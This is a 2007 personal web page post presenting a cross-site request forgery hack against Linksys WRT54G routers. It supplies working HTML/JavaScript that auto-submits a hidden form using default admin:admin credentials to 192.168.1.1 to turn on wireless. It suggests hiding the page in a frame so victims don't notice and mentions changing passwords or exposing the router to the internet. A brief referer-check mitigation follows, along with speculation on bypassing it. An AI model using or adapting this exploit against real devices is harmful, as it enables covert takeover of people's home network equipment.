Router HacksPosted: Sometime in 2007 Introduction I'm not sure if this has been done by others before, but here's a cool little hack for breaking into Linksys routers :). There are actually at least two ways to do this including leaving out the username:password part (admin:admin) assuming the user had already logged into the router earlier, this will guarantee you can log into the router remotely. The way I do it here is assuming the username is admin and the password is admin and assumes the IP address of the router is a linksys and has the IP address 192.168.1.1. At this point all I need to do is submit my form with Javascript into the browser. This example turns on the wireless unit in the router. Technically, nothing stops me from submitting a form to do things such as change the router's password or open up the router to the outside world. This hack can be modified to affect other routers. I used Linksys because I have one handy :). Btw, another fun Linksys project is here: Linksys Quadcopter. Sample Code - How To Turn On Wireless on Linksys WRT54G Rev 5 Routers Simply make a web page that the user loads in their browser at with code that looks like this. This could all be hidden in a frame or something so the user doesn't know this is happening.
<html>
<body onload="hack();">
<script language="javascript">
function hack()
{
document.forms[0].submit();
}
</script>
<form name="wireless" action="http://admin:admin@192.168.1.1/WBasic.tri" method="post">
<input name="Mode" value="2" type="hidden">
<input name="channelno" value="6" type="hidden">
<input name="OldWirelessMode" value="0" type="hidden">
</form>
</body>
</html>
How Users Can Protect Themselves There are a few things that can be done to protect from this hack.
How Router Manufacturers Can Protect From This By simply checking the refer header to make sure the form was submitted the above hack could be completely avoided. The refer header could check and make sure the form was submitted from a page that was served by the router. A possibility of getting around that would be maybe to have a hidden frame that loads a page on the router and use javascript to submit it, but I havn't tried it :).
Copyright 1997-2024 - Michael Kohn
|